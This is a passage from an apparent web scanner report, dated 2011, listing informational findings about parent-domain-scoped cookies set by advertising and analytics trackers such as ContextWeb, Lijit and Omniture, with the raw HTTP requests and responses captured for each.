Cookie: ar_p91143664=exp=1&initExp=Fri May 20 12:39:51 2011&recExp=Fri May 20 12:39:51 2011&prad=296638381&arc=218676885&; ar_p101866669=exp=1&initExp=Sat May 21 12:32:54 2011&recExp=Sat May 21 12:32:54 2011&prad=323226876&arc=219379757&; ar_p84552060=exp=1&initExp=Sat May 21 12:33:10 2011&recExp=Sat May 21 12:33:10 2011&prad=2108512&arc=4477554&; ar_p56282763=exp=1&initExp=Sat May 28 21:31:35 2011&recExp=Sat May 28 21:31:35 2011&prad=62187190&cpn=910903057632460979&arc=41550035&; ar_p101945457=exp=2&initExp=Thu Jun 2 01:11:58 2011&recExp=Thu Jun 2 01:16:20 2011&prad=64669762&arc=42330646&; ar_p81479006=exp=5&initExp=Mon May 23 12:32:43 2011&recExp=Mon Jun 6 10:06:28 2011&prad=64422792&rn=1787539&arc=40380395&; ar_p20101109=exp=2&initExp=Mon Jun 6 11:54:51 2011&recExp=Mon Jun 13 11:13:21 2011&prad=11794&arc=15313&; ar_p97464717=exp=1&initExp=Mon Jun 13 11:26:24 2011&recExp=Mon Jun 13 11:26:24 2011&prad=1468426&arc=150255&; ar_p104567837=exp=2&initExp=Mon Jun 13 11:34:28 2011&recExp=Tue Jun 14 00:15:28 2011&prad=63567820&arc=42361216&; ar_p85001580=exp=1&initExp=Thu Jun 16 14:08:59 2011&recExp=Thu Jun 16 14:08:59 2011&prad=62126627&arc=42474885&; ar_p45555483=exp=1&initExp=Thu Jun 16 18:27:25 2011&recExp=Thu Jun 16 18:27:25 2011&prad=64578880&arc=36816991&; ar_p104939219=exp=1&initExp=Sun Jun 19 22:38:12 2011&recExp=Sun Jun 19 22:38:12 2011&prad=9007&cpn4=1&arc=97&; ar_p90452457=exp=3&initExp=Fri Jun 17 15:21:04 2011&recExp=Mon Jun 20 16:57:27 2011&prad=310146149&arc=222480638&; ar_p82806590=exp=7&initExp=Sat May 21 12:32:31 2011&recExp=Thu Jun 23 22:13:14 2011&prad=62872914&arc=42476438&; UID=4a757a7-24.143.206.42-1305663172; ar_p97174789=exp=14&initExp=Tue May 17 20:12:51 2011&recExp=Fri Jun 24 13:26:47 2011&prad=242390407&arc=206438376&; BMX_G=method->-1,ts->1308922007; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Fri, 24 Jun 2011 13:30:59 GMT
Connection: close
Set-Cookie: UID=4a757a7-24.143.206.42-1305663172; expires=Sun, 23-Jun-2013 13:30:59 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


12.15. http://bh.contextweb.com/bh/rtset  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/rtset

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/rtset?do=add&pid=537085&ev=E3F32BD05A8DDF4D5646D79640088B HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; V=8vciuQJMXXJY; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web80
Cache-Control: no-cache, no-store
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Mon, 18-Jun-2012 17:04:27 GMT; Path=/
Set-Cookie: pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0; Domain=.contextweb.com; Expires=Sat, 23-Jun-2012 17:04:27 GMT; Path=/
Content-Type: image/gif
Date: Fri, 24 Jun 2011 17:04:26 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

12.16. http://bh.contextweb.com/bh/set.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bh.contextweb.com
Path:   /bh/set.aspx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bh/set.aspx?action=add&advid=357&token=EHEX1 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://www.redorbit.com/news/business/1993118/spil_games_selects_adyens_internet_payment_system_for_global_social/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%0A2866%3B07%2F06%2F2011%3BSHME2; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|531399.1voofy6a0tk1w.0|534889.csmq4atf04cxa.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|536088.2814750682866683.0|535461.4325897289836481830.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Mon, 18-Jun-2012 13:31:14 GMT; Path=/
Set-Cookie: cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2; Domain=.contextweb.com; Expires=Sat, 28-May-2016 13:31:14 GMT; Path=/
Content-Type: image/gif
Date: Fri, 24 Jun 2011 13:31:13 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

12.17. http://ce.lijit.com/merge  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ce.lijit.com
Path:   /merge

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /merge?pid=2&3pid=E3F32BD05A8DDF4D5646D79640088B HTTP/1.1
Host: ce.lijit.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1524815;type=indiv176;cat=indiv925;ord=1;num=7855084345210.344?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ljt_ts=t=1305981518646479; ljt_reader=hICMzwpkPEwAACnGFdIAAAAE; tpro_inst=269d9846e9d950257f8d2f16e66681e2; tpro=eJxVUdtuhSAQ%2FJd9JmYRL9Xf6ONJQwiikigY0CaN8d%2B7YM457dvsMjM7oydswY92MdCfMBk3mJDQqtIGi5bBaJ6DuBioKTOF5CWtGHBC7Y0%2BpKgyrWIgall1aajIoUa5LUdMI%2B%2FIIyidTbQ6NPScTMcg1ZpdVLTKZTTbuGXg9zmFQlLq2S5DMC6pnU%2BGHcl%2FTPbG5G2d9mt2RynwXlMclA0%2BszUoOd5TTbHxna4s0w2%2FLOZu6bzLxavmzxqLmm5OQQ0y6jlfEBfpot1TjseZEfTwufmwR6BOO7UU2HZN2ZXNxV6MUbloBzMUlPkfTzQ1v75e1el%2F7Da1er8yWP0gtT8ciUoG3yZE6%2BnDAC8QrusXAdOE%2Fw%3D%3D; ljt_csync=dotomi%2Crtb_turn%2C1%2Crtb_simplifi; ljtrtb=eJyrVjJUslIyMTYytbA0N7KwtDA2M7EwtDA2UKoFAFDjBd4%3D

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 17:04:28 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n28 ( iad-agg-n33), ms iad-agg-n33 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
Pragma: no-cache
Expires: Sat, 25 Jun 2011 17:04:28 GMT
Content-Length: 43
Content-Type: image/gif
Connection: keep-alive
Set-Cookie: ljtrtb=eJyrVjJSslJyNXYzNnJyMTB1tHBxcTNxMTUzMXMxtzQzMTCwsHBSqgUAqREIvw%3D%3D; expires=Sat, 23-Jun-2012 17:04:28 GMT; path=/; domain=.lijit.com

GIF89a.............!.......,...........D..;

12.18. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467?[AQB]&ndh=1&t=24/5/2011%208%3A48%3A13%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&events=event2&c1=Not%20Logged%20In&c2=4394%20Official%20EA%20Twitter%20Accounts&v2=4394%20Official%20EA%20Twitter%20Accounts&v8=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c10=aUVJ8dT1kyDausb%7Eh_bFiS7qw_UUe4csS3t_7t2XSRu2xT4Rw_utv%7Ed4aiCmSuKJB08Gak%7EHWcm0ISPK9SiD3Q4zt2F7FUcieOWOwbX9de0v5fIS_t8F%7E4WjauP%7EbsABNKlAA44bEVwuaUqqwcE8ZFXvCBwnBx6NHO8mMQtG9g_Dt6EBTeufVzKVUyz5AGdfSCoCY95rAJXfspuz%7EQJa_lGeTy6cVRUd0a_ZKq8IY2cOLSDVM_q8Amt1aPx0KIIPjxEeoR0tvR0UA%21&c15=EA%20Support&pid=View%20Answer&pidt=1&oid=http%3A//support.ea.com/app/ask&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:48:14 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:48:14 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:48:14 GMT
Last-Modified: Sat, 25 Jun 2011 13:48:14 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E04959E-3682-6FD6BEE2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www337
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.19. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727?[AQB]&ndh=1&t=24/5/2011%208%3A47%3A32%205%20300&ce=UTF-8&pageName=Support%20Home&g=http%3A//support.ea.com/&cc=USD&c1=Not%20Logged%20In&v8=aU84DuwUwY9gAhoN137mIdeb2MlklSkQKAUA_1uW_w4uKV9mqls6n6fRxH0x0NYUkUmialo2t8WgxRqvPN%7EF3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo%7EU%7Eihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz%7EHv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI%21&c10=aU84DuwUwY9gAhoN137mIdeb2MlklSkQKAUA_1uW_w4uKV9mqls6n6fRxH0x0NYUkUmialo2t8WgxRqvPN%7EF3ORX9u_4mKmEchm_Tu0t1DvdTRtxLfbbx5ltTw8s9D4UMa_uRcumg2x9NzthyDo%7EU%7Eihqm2dEGCf5UP50ehVCmce5Kj9V1rZC6PP4P2bZGCViFgvJMmYy6oXQBcQY3Yz%7EHv0U62RjTo2adFX6Vp02V3lm5rIQLUnvKHVfSwG5ttISZcxk4BKJF8cI%21&c15=EA%20Support&pid=Support%20Home&pidt=1&oid=javascript%3Avoid%28openPositionedWindow%28%27http%3A//www.info.ea.com%27%2C%2520%27info%27%2C%2520780%2C%2520800%2C%25200%2C%25200%2C%2520t&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:47:33 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:47:33 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Thu, 23 Jun 2011 13:47:33 GMT
Last-Modified: Sat, 25 Jun 2011 13:47:33 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E049575-630B-08274CF4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www227
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

12.20. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://eacustomerservice.112.2o7.net
Path:   /b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536?[AQB]&ndh=1&t=24/5/2011%208%3A50%3A20%205%20300&ce=UTF-8&pageName=View%20Answer&g=http%3A//support.ea.com/app/answers/detail/a_id/4394&r=http%3A//support.ea.com/&cc=USD&pe=lnk_e&pev1=http%3A//twitter.com/askeasupport&pid=View%20Answer&pidt=1&oid=http%3A//twitter.com/askeasupport&ot=A&s=1920x1200&c=32&j=1.3&v=Y&k=Y&bw=1057&bh=822&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&[AQE] HTTP/1.1
Host: eacustomerservice.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://support.ea.com/app/answers/detail/a_id/4394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; s_vi_cx7Emox60ijcx7Eyax7F=[CS]v4|26FDBD8E8516389A-40000182A036DCE4|4DFB7B1A[CE]; s_vi_exxkifoneiy=[CS]v4|26FDBDD785163C8A-600001A4A0410776|4DFB7BAE[CE]; s_vi_ydwuzseyzcbx7Fyxxeuwbwzyq=[CS]v4|26FDBDF385010424-600001042024391B|4DFB7AE9[CE]; s_vi_x7Ecprx7Dtrcx7Cx7Ex7Futx7Cpx7Fu=[CS]v4|26FDBDF905011642-40000102001B21C0|4DFB7AE9[CE]; s_vi_fx7Bhjelfyg=[CS]v4|26FDE30B05012C17-6000010AC028E4D5|4DFBFAA5[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|26FDBDF3050116C8-400001044015891A|4DFBFAA5[CE]; s_vi_bx7Flnahbycadx7Bh=[CS]v4|26FDE2F5050127E0-40000101E02C31E0|4DFBFAA5[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DFC0A43[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DFC0A43[CE]; s_vi_x604hukn=[CS]v4|26FFF4F005012A85-600001170004C104|4DFFE9E0[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4E03BA67[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4E03BA67[CE]; s_vi_xxderi9ix7Ehdf=[CS]v4|2701DFF385161E82-400001A0C0184269|4E03BFE6[CE]; s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 24 Jun 2011 13:50:21 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tprdbex7Ex7Ctcbtcgxxrt=[CS]v4|27024A530515B368-4000018120002BF6|4E0494A5[CE]; Expires=Wed, 22 Jun 2016 13:50:21 GMT; Domain=.2o7.net; Path=/
